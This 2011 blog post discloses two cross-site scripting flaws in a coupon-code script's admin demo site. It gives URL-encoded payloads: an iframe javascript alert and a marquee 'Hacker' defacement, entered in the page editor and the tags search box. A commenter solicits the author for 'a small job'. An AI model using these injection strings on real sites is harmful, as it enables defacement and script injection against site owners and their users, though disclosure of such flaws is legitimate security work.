Coupon codes XSSed by me ;)

vendor: www.bacsdemo.com/admindemo/

XSS vulnerability in the admin panel->static page->add new section. In html mode type the following string:

“%3E%3Ciframe src=”javascript:alert(‘XSSed by 3psil0nLamBdA’);”%3E

%3C/iframe%3E

XSS vulnerability in admin panel->tags->manage tags section.

In the search box type in the following string:

“%3E%3Cmarquee%3E%3Ch1%3EHacker%3C/h1%3E%3C/marquee%3E

The webpage is defaced with the following marquee on the screen.\m/

Cheers

3psil0nLamBdA

Advertisements

Posted on July 12, 2011, in Uncategorized. Bookmark the permalink. 1 Comment.

  1. Damm, good hack to it. I was wondering if you can contact me for a small job.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: